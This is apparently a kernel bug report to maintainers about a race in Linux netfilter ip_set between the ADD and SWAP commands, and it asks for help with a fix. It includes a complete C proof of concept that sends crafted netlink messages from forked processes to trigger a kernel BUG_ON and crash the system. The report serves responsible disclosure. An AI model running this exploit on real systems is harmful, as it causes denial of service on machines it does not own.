Hi, There is a race between IPSET_CMD_ADD and IPSET_CMD_SWAP in netfilter/ip_set, which can lead to the invocation of `__ip_set_put` on a wrong `set`, triggering the `BUG_ON(set->ref == 0);` check in it. More specifically, in `ip_set_swap`, it will hold the `ip_set_ref_lock` and then do the following to swap the sets: ~~~ strncpy(from_name, from->name, IPSET_MAXNAMELEN); strncpy(from->name, to->name, IPSET_MAXNAMELEN); strncpy(to->name, from_name, IPSET_MAXNAMELEN); swap(from->ref, to->ref); ~~~ But in the retry loop in `call_ad`: ~~~ if (retried) { __ip_set_get(set); nfnl_unlock(NFNL_SUBSYS_IPSET); cond_resched(); nfnl_lock(NFNL_SUBSYS_IPSET); __ip_set_put(set); } ~~~ No lock is hold, when it does the `cond_resched()`. As a result, `ip_set_ref_lock` (in thread 2) can swap the set with another when thread 1 is doing the `cond_resched()`. When it wakes up, the `set` variable alreays means another `set`, calling `__ip_set_put` on it will decrease the refcount on the wrong `set`, triggering the `BUG_ON` call. I'm not sure what is the proper way to fix this issue so I'm asking for help. A proof-of-concept code that can trigger the bug is attached. The bug is confirmed on v5.10, v6.1, v6.5.rc7 and upstream. Best, Kyle
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <time.h> #include <unistd.h> #include <assert.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <linux/netfilter/nfnetlink.h> #include <stdint.h> int nl_sock; void *build_pkt(struct nlmsghdr *hdr, struct nfgenmsg *nfgenmsg, void *attrs, int attr_len) { void *payload = calloc(1, 0x1000); void *ptr = payload; hdr->nlmsg_len = sizeof(struct nlmsghdr) + sizeof(struct nfgenmsg) + attr_len; //printf("%#x %#x %#x\n", sizeof(struct nlmsghdr), sizeof(struct nfgenmsg), attr_len); //printf("nlmsg_len: %#x\n", hdr->nlmsg_len); //printf("attr_len: %#x\n", attr_len); memcpy(ptr, hdr, sizeof(struct nlmsghdr)); ptr += sizeof(struct nlmsghdr); memcpy(ptr, nfgenmsg, sizeof(struct nfgenmsg)); ptr += sizeof(struct nfgenmsg); memcpy(ptr, attrs, attr_len); return payload; } void func1() { struct nlmsghdr nlmsghdr = { .nlmsg_len = 0, .nlmsg_type = 0x609, // IPSET_CMD_ADD(9) | subsys_id = NFNL_SUBSYS_IPSET(6) .nlmsg_flags = 1, // NLM_F_REQUEST(1) .nlmsg_seq = 0, // NL_AUTO_SEQ .nlmsg_pid = 0 // NL_AUTO_PID }; struct nfgenmsg nfgenmsg = { .nfgen_family = 0, .version = 0, .res_id = 0 }; char attrs[] = "\x05\x00""\x01\x00""\x07\x00\x00\x00" // IPSET_ATTR_PROTOCO, protocol is hardcoded to 7 "\x09\x00""\x02\x00""set2\x00\x00\x00\x00" // IPSET_ATTR_SETNAME "\x54\x00""\x07\x80" // IPSET_ATTR_DATA "\x06\x00""\x04\x40""\x00\x00\x00\x00" // IPSET_ATTR_PORT_FROM "\x06\x00""\x05\x40""\x4e\x00\x00\x00" // IPSET_ATTR_PORT_TO "\x05\x00""\x07\x00""\x11\x00\x00\x00" // IPSET_ATTR_PROTO => IPPROTO_UDP, just a protocol that has ports (ip_set_proto_with_ports) "\x08\x00""\x08\x40""\x00\x00\x00\x00" "\x18\x00""\x14\x80" "\x14\x00""\x02\x40""\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa" "\x18\x00""\x01\x80" "\x14\x00""\x02\x40""\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\xff\xff\x7f\x00\x00\x01"; void *payload = build_pkt(&nlmsghdr, &nfgenmsg, attrs, sizeof(attrs)-1); send(nl_sock, payload, nlmsghdr.nlmsg_len, 0); } void func2() { struct nlmsghdr nlmsghdr = { .nlmsg_len = 0, .nlmsg_type = 0x606, // IPSET_CMD_SWAP(6) | subsys_id = NFNL_SUBSYS_IPSET(6) .nlmsg_flags = 1, // NLM_F_REQUEST(1) .nlmsg_seq = 0, // NL_AUTO_SEQ .nlmsg_pid = 0 // NL_AUTO_PID }; struct nfgenmsg nfgenmsg = { .nfgen_family = 0, .version = 0, .res_id = 0 }; char attrs[] = "\x09\x00""\x03\x00""set1\x00\x00\x00\x00" "\x05\x00""\x01\x00""\x07\x00\x00\x00" // IPSET_ATTR_PROTOCO, protocol is hardcoded to 7 "\x09\x00""\x02\x00""set2\x00\x00\x00\x00"; void *payload = build_pkt(&nlmsghdr, &nfgenmsg, attrs, sizeof(attrs)-1); send(nl_sock, payload, nlmsghdr.nlmsg_len, 0); } void context_setup() { nl_sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER); struct nlmsghdr nlmsghdr1 = { .nlmsg_len = 0, .nlmsg_type = 0x602, // IPSET_CMD_CREATE(2) | subsys_id = NFNL_SUBSYS_IPSET(6) .nlmsg_flags = 0x1, // NLM_F_REQUEST(1) .nlmsg_seq = 0, // NL_AUTO_SEQ .nlmsg_pid = 0 // NL_AUTO_PID }; struct nfgenmsg nfgenmsg1 = { .nfgen_family = 0, .version = 0, .res_id = 0 }; char attrs1[] = "\x09\x00""\x02\x00""set2\x00\x00\x00\x00" "\x05\x00""\x04\x00""\x00\x00\x00\x00" // IPSET_ATTR_REVISION "\x15\x00""\x03\x00""hash:ip,port,net\x00\x00\x00\x00" "\x05\x00""\x05\x00""\x0a\x00\x00\x00" // IPSET_ATTR_FAMILY => NFPROTO_IPV6(0xa) "\x05\x00""\x01\x00""\x07\x00\x00\x00"; void *payload1 = build_pkt(&nlmsghdr1, &nfgenmsg1, attrs1, sizeof(attrs1)-1); send(nl_sock, payload1, nlmsghdr1.nlmsg_len, 0); struct nlmsghdr nlmsghdr2 = { .nlmsg_len = 0, .nlmsg_type = 0x602, // IPSET_CMD_CREATE(2) | subsys_id = NFNL_SUBSYS_IPSET(6) .nlmsg_flags = 0x1, // NLM_F_REQUEST(1) .nlmsg_seq = 0, // NL_AUTO_SEQ .nlmsg_pid = 0 // NL_AUTO_PID }; struct nfgenmsg nfgenmsg2 = { .nfgen_family = 0, .version = 0, .res_id = 0 }; char attrs2[] = "\x05\x00""\x05\x00""\x0a\x00\x00\x00" // IPSET_ATTR_FAMILY => NFPROTO_IPV6(0xa) "\x09\x00""\x02\x00""set1\x00\x00\x00\x00" "\x15\x00""\x03\x00""hash:ip,port,net\x00\x00\x00\x00" "\x05\x00""\x04\x00""\x00\x00\x00\x00" // IPSET_ATTR_REVISION "\x05\x00""\x01\x00""\x07\x00\x00\x00"; void *payload2 = build_pkt(&nlmsghdr2, &nfgenmsg2, attrs2, sizeof(attrs2)-1); send(nl_sock, payload2, nlmsghdr2.nlmsg_len, 0); } int main(void) { context_setup(); if(!fork()) func1(); if(!fork()) func2(); getchar(); return 0; }